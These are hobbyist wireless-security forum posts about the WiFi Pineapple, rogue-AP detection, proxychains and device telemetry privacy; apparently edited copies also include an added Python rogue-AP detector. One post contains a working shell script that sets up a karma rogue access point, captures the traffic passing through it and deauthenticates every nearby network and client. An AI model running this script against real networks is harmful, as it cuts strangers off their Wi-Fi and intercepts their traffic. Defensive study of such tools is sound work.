telot

Posts posted by telot

  1. First off, Barry, what are you holding out on us dude? What are those things and for the love of god take my money NOW. They look like Sharp made badass Zipits on crack!


    Anyways, what you're looking for Seek0380, is a WIPS (or really WIDS) - a Wireless Intrusion Detection/Prevention System. That is almost exactly opposite of what the pineapple is/does. The pineapple is by its very definition a rogue access point, which is exactly what WIPS detect and contain. Meraki has a free access point you can get by watching one of their webinars. It has a feature called Air Marshal, which is WIPS. Get one of those for sure. Keep in mind though, in my initial testing the meraki has not yet detected a karma'd rogue access point hehe. It does however detect every other legit access point in my house/neighborhood.

    If you want to learn about wifi and get to know the low-ish level stuff, you can do the same thing with an Alfa card (or the pineapple) in monitor mode. This is the fun/cool/hackerish way. I would highly recommend doing it with an Alfa card, as it's much more supported, and that way you don't have to mess with the pineapple's workings (pass it along to a friend who will use it for what it's intended instead :).

    Step 1: Plug in Alfa AWUS036H to laptop

    Step 2: Open up virtual machine running Backtrack

    Step 3: Forward the alfa to the virtual machine (the alfa may show up as Realtek)

    Step 4: Open terminal and type: airmon-ng start wlan0

    Step 5: Type in airodump-ng mon0

    Step 6: Enjoy seeing every access point (hidden ssid or not) within range

    telot
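    A small, defender-side version of the "do it yourself with a card in monitor mode" idea above, added here as an example and not part of the original post: it reads the CSV that airodump-ng writes with --output-format csv and flags anything that is not a known, authorised access point, which is the core of what a WIDS like Air Marshal does. The allowlist and the capture rows are constructed for illustration.

```python
import csv
import io

# Constructed allowlist of authorised APs: BSSID -> the ESSID it should beacon.
KNOWN_APS = {
    "00:11:22:33:44:55": "HomeNet",
}

# Constructed sample in the layout airodump-ng writes with --output-format csv:
# blank line, AP header + rows, blank line, then the station section (ignored here).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2012-03-03 10:00:01, 2012-03-03 10:05:00,  6,  54, WPA2, CCMP, PSK, -42,      120,        0,   0.  0.  0.  0,   7, HomeNet, 
DE:AD:BE:EF:00:01, 2012-03-03 10:02:11, 2012-03-03 10:05:00,  6,  54, OPN ,     ,    , -35,       90,        0,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:DD:EE:FF, 2012-03-03 10:03:40, 2012-03-03 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,       30,        0,   0.  0.  0.  0,  10, Free WiFi!, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2012-03-03 10:04:00, 2012-03-03 10:05:00, -50,       12, DE:AD:BE:EF:00:01, HomeNet
"""

def parse_aps(text):
    """Return the AP section as a list of dicts keyed by the CSV header names."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(cell.strip() for cell in row):
            if header:  # the blank line after the AP rows ends the AP section
                break
            continue
        if header is None:
            header = [h.strip() for h in row]
            continue
        aps.append({h: v.strip() for h, v in zip(header, row)})
    return aps

def find_rogues(aps, known=KNOWN_APS):
    """Classify each AP the way a WIDS would: authorised, evil twin, or unknown."""
    trusted_essids = set(known.values())
    alerts = []
    for ap in aps:
        bssid, essid = ap["BSSID"], ap["ESSID"]
        if bssid in known:
            if essid != known[bssid]:
                alerts.append((bssid, essid, "authorised AP beaconing unexpected ESSID"))
        elif essid in trusted_essids:  # our name on a BSSID we do not own (here even open)
            alerts.append((bssid, essid, "evil twin of trusted ESSID"))
        else:
            alerts.append((bssid, essid, "unknown access point"))
    return alerts
```

    Against a real dump, call find_rogues(parse_aps(open("capfile-01.csv").read())) and alert on whatever comes back; the sample rows produce one evil-twin hit and one unknown AP.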

  2. I love the post digip. I didn't want to comment at first, it just seemed like one of those...

    Anyways, well put. You're certainly a pillar of the community here and we all appreciate the depth of knowledge you're willing to share with us. You and Mr P. and Infiltrator and Whistle Master (for us pineapplers) make this place what it is, and make it a destination for aspiring white hats.

    As for the band, first of all you rock, second of all - TWISTED PAIR! When I saw the name, I totally lol'd.

    For those non-cabling nerds:

    http://www.twistedpair.co/wp/wp-content/uploads/2012/03/twisted-pair-cable.gif

    telot

  3. I am receiving my (completely free!) meraki access point today. It has a feature called "Air Marshal" which is their WIPS (zomg what an awesome name for it right?!). I will be testing karma on the raspberry pi along with the mark3 and mark4 pineapples extensively this weekend and in the coming weeks. Stay tuned!

    telot

  4. Haha - the same thing happened to me when I first got my pineapple. First day, working with the button press script and...bam. The button just sank in and didn't pop back. The Alfas certainly aren't the highest of quality, but you're paying ~$100 for a full-blown pen testing router. I think the trade-off of affordability vs build quality is worth it in this case.

    telot

  5. Here's a script I wrote up for my old mark3 for automated pineappling when connected to a backtrack5 laptop. It will require some modification to work with your setup, but it might be a good way to learn :) Hope you can get some value from it. Cheers

    #!/bin/sh
    #telot presents....:::drum roll:::
    #One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
    #Note that this script makes quite a few assumptions. They are:
    #You are using backtrack5R1.
    #Your interface that is connecting to the internet is wlan0
    #Your interface that is connecting to the pineapple is eth0
    #You have a alfa realtek usb card capable of monitor mode plugged in.
    #You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
    #You have not run wp3.sh or any other network configuration stuff.
    #You have your pineapple configured to autostart karma at bootup.
    #This script is meant to run on your laptop upon bootup.
    #Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
    #So the internet I'm serving up in my pentest lab is actually run through my cellphone.
    #So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
    #Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
    #I'm keeping most configuration and capture files on the desktop for ease.
    cd /root/Desktop/
    #Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
    #iwconfig wlan0 essid EssidOfAPyouWantToUse
    #-B backgrounds wpa_supplicant, -Dwext selects the wext driver (the original had "-B Dwext", which is a typo)
    wpa_supplicant -B -Dwext -i wlan0 -c Jack.conf
    dhclient wlan0
    #Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
    #Bring up Ethernet Interface directly connected to Pineapple
    ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
    # Enable IP Forwarding
    echo '1' > /proc/sys/net/ipv4/ip_forward
    echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
    cat /proc/sys/net/ipv4/ip_forward
    #clear chains and rules
    iptables -X
    iptables -F
    echo iptables chains and rules cleared
    #setup IP forwarding
    #new connections from the pineapple LAN come in on eth0 and go out the internet-facing wlan0 (the original had wlan0 for both)
    iptables -A FORWARD -i eth0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    #masquerade only on the upstream interface
    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
    echo IP Forwarding Enabled
    #remove default route
    route del default
    echo Default route removed
    #add default gateway
    route add default gw 192.168.1.1 wlan0
    echo Pineapple Default Gateway Configured
    #instructions
    #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
    ping -c3 172.16.42.1
    if [ $? -eq 0 ]; then
    echo "ICS configuration successful."
    #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
    #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
    #echo "Enter Pineapple password if prompted"
    #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
    fi
    echo ""
    echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
    echo ""
    #Now on to the fun stuff!
    #
    #
    #
    #Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
    #Remember to screen -r back to it and get rid of it when you're done.
    screen -d -m wireshark -i eth0 -k -w sharkcap &
    #This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
    #This is also created in a detached screen. So remember to cleanup when you're done!
    #
    #
    #Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys.
    #I set mine to allow the pineapple & my hotspot and deny everyone else.
    ifconfig wlan1 up
    airmon-ng start wlan1
    cd /pentest/wireless/airdrop-ng/
    screen -d -m airodump-ng mon0 -w capfile --output-format csv
    sleep 20
    python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf

    telot
  6. digip nailed it. One thing I would add is that windows7 for the user doesn't blow that much. They really did a pretty dang good job with it. If kept up to date, it's pretty secure. You pretty much have to be a royal dumbass and download/run a bad exe to get into trouble with windows7. There are no huge gaping holes like that of XP (i.e. there's no rpc dcom vuln). Now I'm just talking about windows7 here, NOT internet explorer. The most recent IE is decent, for now - but that will soon end. Every previous iteration of IE has been riddled with holes and exploited a hundred times over, and I see no evidence that their latest and greatest won't befall the same fate. The same goes for most browsers - BeEF and msf browser autopwn will just thrash a browser. But that's not what we're talking about here (I think...)

    Yes, for the sysadmin, a windows world can be annoying from what I've heard - I sysadmin ubuntu/centos and my life is AWESOME. Just using windows7 though, what's there to complain about? Every piece of commercial software ever invented runs on windows first, gaming rocks, and it's pretty secure these days.

    I still run OSX, but only because I love Apple's hardware - I'm able to do that only because I run at least one Windows7 VM at all times :D

    telot

  7. Good day my fellow pineapplers!

    I'm very curious about the pinenumbers feature. Why would we want anyone (even you Seb/Darren) to track usage on a device that is so easily (and dare I say commonly?) used for illegal/semi-legal things? The very nature of the pineapple is grey-hat at best. It's purpose-built to take advantage of inherent trust vulnerabilities and exploit them. This is great for pentesters, but not everyone who buys/uses a pineapple is a pentester.

    I know, I know, there's plenty of disclaimers about not using it for nefarious activities - which protects you guys very well. You certainly need these boilerplate statements when building/supporting this kind of device. But what protects us, the consumers? I understand your want for usage statistics, just like any dev - you can build better future products and continue to increase functionality in a more efficient way with your current products. With this type of device, with this market you're in, with these privacy-paranoid customers that you have...it just doesn't make sense in my brain. Tell me, why would I allow that on my pineapple?

    My second argument is that of contractual privacy afforded to my customers. Say I use the pineapple for legal pen testing as I should, and say I am pentesting a fortune 500 company or even better, a government institution. What happens on a pen test, stays in a pen test. By contractual obligation I can only share the results of the pen test with my customers in their status reports and final report. By allowing the pineapple to send usage statistics and other metrics (even anonymous ones) to the cloud, the pineapple would break that trust I have with my customers and infringe on the contracts I've signed and get paid for.

    I understand there's going to be an opt-out function in the gui (and I hope cli support as well) - but I thought I'd explain myself as to why I won't be participating with some of my pineapples. My test pineapples, the one I play with at home, the one I use to rick roll my friends - I will surely leave on for your metrics. Ones that are actually used on jobs, I'm afraid I just can't, and I hope you understand. I'd love to begin a dialog about this, so please let me know your thoughts. Thanks everyone!

    telot

  8. Have you watched all the hak5 episodes on the pineapple? There are several. They totally explain what to expect from the pineapple and (along with the book) how to get started. After that, give the wiki a try. If you've never used a terminal before, check out Shannon's basic terminal usage episodes on HakTip - it's a great beginners guide. Watching the hak5 episodes about SSH certainly can't hurt, as some of it pertains to the pineapple (reverse ssh). If you need help, you gotta narrow down what you're asking us - What do you want to do with your pineapple and at what point do you get stuck?

    telot

  9. All I did is follow the instructions to build a Pi-Point (it's on raspberrypi.org) which basically just details what you need to apt-get and configure (dnsmasq and hostapd). I then just copied the hostapd file from digininja's site (robin wood, the original karma/jasager/pineapple creator) and that's about it! Give it a shot and if you run into troubles, create a new thread and I'll chime in with any help I can. Good luck!

    It was pretty simple, but I can write up a proper how-to if you'd like too :)

    telot

  10. Agreed with digip. If the site you're creating is to be professional at all, you gotta pay. It was easy and fun for me to roll my own, mostly because I just wanted to learn about the LAMP process. I've since stopped it because I just don't give a shit (hence why telot.org is a crappy website). Is there something stopping you from doing that? That way you have total control of everything (you own the hardware, the bandwidth, the software - everything is on your home machine).

    So the real question is, what kind of site are you aiming at creating, interweb?

  11. Good day to everyone

    As the subject states, I have a general question regarding proxychains. I've watched the hak5 episode on it (ep 11.19) but I'm curious as to how you guys (fellow white/grey hats) get access to the various ssh servers that you're then chaining together. Do any of you use any so-called "Free Shells"? I've checked out a couple of the free shell providers, but they mostly seem to be crap (fill out these polls, sign up for these 15 credit cards, give us your email to spam, etc). My goal for this is mostly just to play with/test proxychains, i.e. how usable is it, get comfortable with the configuration, etc.

    Anyone have any insight into how I can experiment with globetrotting ssh tunnels? Thanks!

    telot

  12. There's really no such thing as a malicious jpeg as far as I know. You can have malicious php code that interacts with jpegs, but that's very different. PDFs are an entirely different animal. A simple google search ("malicious pdf" for example) will turn up lots and lots of information on this.

    telot

  13. Ha! I just hit your other post first. Thanks very much for the offer Matt. After watching their webinar, I'm considering getting a couple test units from them and if they work out, probably buying a dozen or so for work. I had no idea they even existed until a couple days ago - now that they're on their way to being bought out (and have record growth, 10k customers) I'm tempted to take them seriously. Free ap for my house is also a very nice bonus.

    Anyone check out their Air Marshal service? I'm curious how it "contains" rogue APs. Do they just aireplay -0 them?

    telot
